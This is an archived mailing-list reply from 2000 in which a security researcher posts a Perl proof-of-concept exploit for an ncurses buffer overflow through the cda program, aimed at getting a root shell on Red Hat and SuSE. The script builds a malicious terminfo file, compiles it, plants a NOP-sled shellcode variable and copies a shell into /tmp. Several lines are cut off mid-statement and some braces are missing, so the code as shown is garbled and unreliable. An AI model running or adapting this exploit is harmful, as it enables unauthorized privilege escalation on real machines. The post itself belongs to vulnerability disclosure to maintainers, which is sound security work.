[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: ncurses buffer overflows (fwd)

From: Jouko Pynnönen
Subject: Re: ncurses buffer overflows (fwd)
Date: Mon, 2 Oct 2000 19:00:52 +0300 (EEST)

On Mon, 2 Oct 2000, Thomas E. Dickey wrote:

> I'd like to see the exploit: there are too many perhaps/maybes in this

This is a demonstration script I sent to linux people on
address@hidden, works straight on rh-6.2 and SuSE-6.4, other platforms
may need fiddling with the number values...


# Proof of concept exploit for ncurses and cda,
# gives root on SuSE and RedHat.
# (c) 2000 Jouko Pynnonen
# This was written for vendors for informational purposes -
# do not distribute.
# Type stty sane <ctrl-j> when the shell starts to get keyboard echo back.

if (!$offset) { $offset=0; }
if (!$buflen) { $buflen=500; }
if (!$align) { $align=0; }

# create the evil terminfo file


open(A,">infofile") || die("Can't write infofile");
print A "
        am, bce, eo, mir, msgr, xenl, xon,
        cols#80, it#8, lines#25,";
$prepad='x' x $align;
$postpad='y' x (4-$align);
print A "cup=$prepad%0".$buflen."d".($addr x 30).($bddr x 
close A;

# compile it
system("tic infofile -o ~/.terminfo 2>/dev/null");

# stabilize env
foreach $e (keys %ENV) {
        delete $ENV{$e} unless $e eq 'HOME';
$ENV{"SHELLCODE"}=("\x90" x 200).

if (! -f "/tmp/sh") {
        if (-f "/bin/ash") { system("cp -f /bin/ash /tmp/sh"); }
                else { system("cp -f /bin/sh /tmp"); }

system("mkdir -p tmp/config;touch tmp/config/common.cfg tmp/config/null");
$st=system("cda -dev /dev/null visual");
if ($st != 0) { print "exit status: $st\n"; }

reply via email to

[Prev in Thread] Current Thread [Next in Thread]